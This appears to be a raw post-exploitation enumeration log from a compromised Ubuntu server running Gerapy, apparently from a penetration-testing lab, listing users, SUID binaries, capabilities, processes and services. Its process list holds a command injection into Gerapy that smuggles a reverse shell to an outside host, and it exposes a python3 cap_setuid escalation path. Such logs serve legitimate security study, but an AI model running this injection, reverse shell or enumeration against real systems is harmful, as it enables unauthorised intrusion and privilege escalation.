System/Kernel
app@ubuntu:~/gerapy$ uname -a ; cat /etc/*release
Linux ubuntu 5.15.0-73-generic #80-Ubuntu SMP Mon May 15 15:18:26 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04 LTS"
PRETTY_NAME="Ubuntu 22.04 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy5.15.0-73-genericUbuntu 22.04 LTS (Jammy Jellyfish)x86_64
Networks
app@ubuntu:~/gerapy$ ip route ; arp -a
default via 192.168.206.254 dev ens160 proto static
192.168.206.0/24 dev ens160 proto kernel scope link src 192.168.206.24
_gateway (192.168.206.254) at 00:50:56:9e:8d:f2 [ether] on ens160app@ubuntu:~/gerapy$ netstat -antup
netstat -antup
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 192.168.206.24:8000 192.168.45.249:49420 ESTABLISHED -
tcp 0 0 192.168.206.24:8000 192.168.45.249:34028 ESTABLISHED -
tcp 0 140 192.168.206.24:34150 192.168.45.249:8000 ESTABLISHED 1736/bash
tcp 0 0 192.168.206.24:8000 192.168.45.249:34492 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* - tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
Users & Groups
app@ubuntu:~/gerapy$ cat /etc/passwd ; ll /home
cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1000:1000:,,,:/home/app:/bin/bash
total 12K
4.0K drwxr-x--- 4 app app 4.0K Jun 14 2023 app
4.0K drwxr-xr-x 3 root root 4.0K Jun 13 2023 .
4.0K drwxr-xr-x 19 root root 4.0K Jun 15 2022 ..p@ubuntu:~/gerapy$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-network) gid=102(systemd-network) groups=102(systemd-network)
uid=102(systemd-resolve) gid=103(systemd-resolve) groups=103(systemd-resolve)
uid=103(messagebus) gid=104(messagebus) groups=104(messagebus)
uid=104(systemd-timesync) gid=105(systemd-timesync) groups=105(systemd-timesync)
uid=105(pollinate) gid=1(daemon) groups=1(daemon)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(syslog) gid=113(syslog) groups=113(syslog),4(adm)
uid=108(uuidd) gid=114(uuidd) groups=114(uuidd)
uid=109(tcpdump) gid=115(tcpdump) groups=115(tcpdump)
uid=110(tss) gid=116(tss) groups=116(tss)
uid=111(landscape) gid=117(landscape) groups=117(landscape)
uid=112(usbmux) gid=46(plugdev) groups=46(plugdev)
uid=999(lxd) gid=100(users) groups=100(users)
uid=1000(app) gid=1000(app) groups=1000(app)uid=1000(app) gid=1000(app) groups=1000(app)
SUIDs
app@ubuntu:~/gerapy$ find / -perm -04000 -ls -type f 2>/dev/null | grep -v '/snap'
8988 20 -rwsr-xr-x 1 root root 18736 Feb 26 2022 /usr/libexec/polkit-agent-helper-1
14483 36 -rwsr-xr-- 1 root messagebus 35112 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1602 332 -rwsr-xr-x 1 root root 338536 Feb 26 2022 /usr/lib/openssh/ssh-keysign
1109 56 -rwsr-xr-x 1 root root 55672 Feb 21 2022 /usr/bin/su
12853 40 -rwsr-xr-x 1 root root 40496 Nov 24 2022 /usr/bin/newgrp
15568 44 -rwsr-xr-x 1 root root 44808 Nov 24 2022 /usr/bin/chsh
15567 72 -rwsr-xr-x 1 root root 72712 Nov 24 2022 /usr/bin/chfn
896 32 -rwsr-xr-x 1 root root 30872 Feb 26 2022 /usr/bin/pkexec
15570 72 -rwsr-xr-x 1 root root 72072 Nov 24 2022 /usr/bin/gpasswd
679 36 -rwsr-xr-x 1 root root 35200 Mar 23 2022 /usr/bin/fusermount3
1185 36 -rwsr-xr-x 1 root root 35192 Feb 21 2022 /usr/bin/umount
15572 60 -rwsr-xr-x 1 root root 59976 Nov 24 2022 /usr/bin/passwd
828 48 -rwsr-xr-x 1 root root 47480 Feb 21 2022 /usr/bin/mount
1074 228 -rwsr-xr-x 1 root root 232416 Apr 4 2023 /usr/bin/sudoSGIDs
app@ubuntu:~/gerapy$ find / -type f -perm -02000 -ls 2>/dev/null | grep -v '/snap'
136845 16 -rwxr-sr-x 1 root utmp 14488 Mar 25 2022 /usr/lib/x86_64-linux-gnu/utempter/utempter
1240 24 -rwxr-sr-x 1 root tty 22912 Feb 21 2022 /usr/bin/write.ul
1227 24 -rwxr-sr-x 1 root tty 22904 Feb 21 2022 /usr/bin/wall
595 40 -rwxr-sr-x 1 root crontab 39568 Mar 23 2022 /usr/bin/crontab
15569 24 -rwxr-sr-x 1 root shadow 23136 Nov 24 2022 /usr/bin/expiry
15566 72 -rwxr-sr-x 1 root shadow 72184 Nov 24 2022 /usr/bin/chage
1095 288 -rwxr-sr-x 1 root _ssh 293304 Feb 26 2022 /usr/bin/ssh-agent
698 28 -rwxr-sr-x 1 root shadow 26776 Feb 2 2023 /usr/sbin/unix_chkpwd
696 24 -rwxr-sr-x 1 root shadow 22680 Feb 2 2023 /usr/sbin/pam_extrausers_chkpwdCapabilities
app@ubuntu:~/gerapy$ getcap -r / 2>/dev/null
/snap/core20/1518/usr/bin/ping cap_net_raw=ep
/snap/core20/1891/usr/bin/ping cap_net_raw=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep/usr/bin/python3.10 cap_setuid=ep
Processes
app@ubuntu:~/gerapy$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.6 167652 13072 ? Ss 00:50 0:00 /sbin/init
root 499 0.0 0.9 64200 18704 ? S<s 00:50 0:00 /lib/systemd/systemd-journald
root 544 0.0 1.3 354884 27100 ? SLsl 00:50 0:00 /sbin/multipathd -d -s
root 546 0.0 0.3 12264 6996 ? Ss 00:50 0:00 /lib/systemd/systemd-udevd
systemd+ 691 0.0 0.3 236816 6628 ? Ssl 00:50 0:00 /lib/systemd/systemd-timesyncd
root 733 0.0 0.5 51124 11828 ? Ss 00:50 0:00 /usr/bin/VGAuthService
root 734 0.0 0.5 315912 10168 ? Ssl 00:50 0:01 /usr/bin/vmtoolsd
systemd+ 822 0.0 0.4 16232 8144 ? Ss 00:50 0:00 /lib/systemd/systemd-networkd
systemd+ 824 0.0 0.6 25528 12596 ? Ss 00:50 0:00 /lib/systemd/systemd-resolved
app 844 0.0 0.1 7368 3440 ? Ss 00:50 0:00 /bin/bash /home/app/run.sh
root 847 0.0 0.1 6892 2828 ? Ss 00:50 0:00 /usr/sbin/cron -f -P
message+ 848 0.0 0.2 8772 4656 ? Ss 00:50 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 855 0.0 0.1 82828 3868 ? Ssl 00:50 0:00 /usr/sbin/irqbalance --foreground
root 856 0.0 0.9 32804 18956 ? Ss 00:50 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 857 0.0 0.3 234484 6884 ? Ssl 00:50 0:00 /usr/libexec/polkitd --no-debug
syslog 858 0.0 0.2 222400 5776 ? Ssl 00:50 0:00 /usr/sbin/rsyslogd -n -iNONE
root 860 0.3 2.0 949336 41948 ? Ssl 00:50 0:10 /usr/lib/snapd/snapd
root 862 0.0 0.3 15020 7332 ? Ss 00:50 0:00 /lib/systemd/systemd-logind
root 864 0.0 0.6 392560 12644 ? Ssl 00:50 0:00 /usr/libexec/udisks2/udisksd
root 867 0.0 2.0 1282932 41344 ? Ssl 00:50 0:01 /usr/bin/containerd
root 881 0.0 0.0 6172 1084 tty1 Ss+ 00:50 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 905 0.0 0.4 15420 8892 ? Ss 00:50 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 906 0.0 0.5 317012 11940 ? Ssl 00:50 0:00 /usr/sbin/ModemManager
root 920 0.0 1.0 109744 21680 ? Ssl 00:50 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
app 1039 2.2 4.5 896736 92712 ? Sl 00:50 1:16 /usr/bin/python3 /usr/local/bin/gerapy runserver 0.0.0.0:8000
app 1734 0.0 0.0 2888 1000 ? S 01:36 0:00 /bin/sh -c gerapy parse --start False --method GET --url None --callback None --cookies '{}' --headers '{}' --meta '{}' --dont_filter False --priority 0 projects/3 `/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.249/8000 0>&1'`
app 1735 0.0 0.1 7368 3504 ? S 01:36 0:00 /bin/bash -c bash -i >& /dev/tcp/192.168.45.249/8000 0>&1
app 1736 0.0 0.2 8708 5236 ? S 01:36 0:00 bash -i
app 1798 0.0 0.1 10332 3696 ? R 01:46 0:00 ps -auxwwwapp 844 0.0 0.1 7368 3440 ? Ss 00:50 0:00 /bin/bash /home/app/run.shroot 847 0.0 0.1 6892 2828 ? Ss 00:50 0:00 /usr/sbin/cron -f -Proot 857 0.0 0.3 234484 6884 ? Ssl 00:50 0:00 /usr/libexec/polkitd --no-debugroot 867 0.0 2.0 1282932 41344 ? Ssl 00:50 0:01 /usr/bin/containerdapp 1039 2.2 4.5 896736 92712 ? Sl 00:50 1:16 /usr/bin/python3 /usr/local/bin/gerapy runserver 0.0.0.0:8000
Cron & Systemd
app@ubuntu:~/gerapy$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for app
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2025-04-05 06:56:27 CST 5h 8min left Sat 2025-04-05 00:52:34 CST 55min ago ua-timer.timer ua-timer.service
Sat 2025-04-05 08:00:00 CST 6h left Sat 2025-04-05 00:52:31 CST 55min ago dpkg-db-backup.timer dpkg-db-backup.service
Sat 2025-04-05 08:00:00 CST 6h left Sat 2025-04-05 00:52:31 CST 55min ago logrotate.timer logrotate.service
Sat 2025-04-05 10:27:20 CST 8h left Tue 2023-06-13 23:29:30 CST 1 year 9 months ago apt-daily.timer apt-daily.service
Sat 2025-04-05 11:11:59 CST 9h left Tue 2023-06-13 15:03:29 CST 1 year 9 months ago fwupd-refresh.timer fwupd-refresh.service
Sat 2025-04-05 12:20:50 CST 10h left Tue 2023-06-13 18:05:39 CST 1 year 9 months ago man-db.timer man-db.service
Sat 2025-04-05 12:28:33 CST 10h left Wed 2023-06-14 00:21:48 CST 1 year 9 months ago motd-news.timer motd-news.service
Sat 2025-04-05 14:05:09 CST 12h left Sat 2025-04-05 00:52:34 CST 55min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sun 2025-04-06 00:55:41 CST 23h left Sat 2025-04-05 00:55:41 CST 51min ago update-notifier-download.timer update-notifier-download.service
Sun 2025-04-06 01:05:37 CST 23h left Sat 2025-04-05 01:05:37 CST 42min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2025-04-06 11:10:30 CST 1 day 9h left Sat 2025-04-05 00:52:31 CST 55min ago e2scrub_all.timer e2scrub_all.service
Sun 2025-04-06 21:53:41 CST 1 day 20h left Wed 2022-06-15 15:50:16 CST 2 years 9 months ago update-notifier-motd.timer update-notifier-motd.service
Mon 2025-04-07 08:13:43 CST 2 days left Sat 2025-04-05 01:00:41 CST 46min ago fstrim.timer fstrim.service
13 timers listed.
Pass --all to see loaded but inactive timers, too.Services
app@ubuntu:~/gerapy$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
app.service loaded active running Gerapy app service
containerd.service loaded active running containerd container runtime
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
irqbalance.service loaded active running irqbalance daemon
ModemManager.service loaded active running Modem Manager
multipathd.service loaded active running Device-Mapper Multipath Device Controller
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
snapd.service loaded active running Snap Daemon
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running User Login Management
systemd-networkd.service loaded active running Network Configuration
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running Rule-based Manager for Device Events and Files
udisks2.service loaded active running Disk Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
multipathd.socket loaded active running multipathd control socket
snapd.socket loaded active running Socket activation for snappy daemon
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-networkd.socket loaded active running Network Service Netlink Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
35 loaded units listed.app.servicecontainerd.service
Sudo Version
app@ubuntu:~/gerapy$ sudo --version
Sudo version 1.9.9
Sudoers policy plugin version 1.9.9
Sudoers file grammar version 48
Sudoers I/O plugin version 1.9.9
Sudoers audit plugin version 1.9.9Sudo version 1.9.9
Glibc Version
app@ubuntu:~/gerapy$ ldd --version
ldd (Ubuntu GLIBC 2.35-0ubuntu3) 2.35
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Ubuntu GLIBC 2.35-0ubuntu3) 2.35